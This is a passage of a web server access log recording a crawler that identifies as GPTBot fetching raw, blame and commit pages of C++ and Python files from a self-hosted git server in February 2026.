74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16094] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13449] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13447] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12297] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10181] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10452] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10179] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13521] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15309] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:16:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10182] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12753] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:16:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:16:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16094] [Gzip 9.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13450] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12298] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:16:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 19978] [Gzip 15.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:16:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:16:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11204] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest" [Client 74.7.227.38] [Length 9793] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:16:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" +[17/Feb/2026:16:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11213] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py" +[17/Feb/2026:16:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 16999] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:56 +0000] 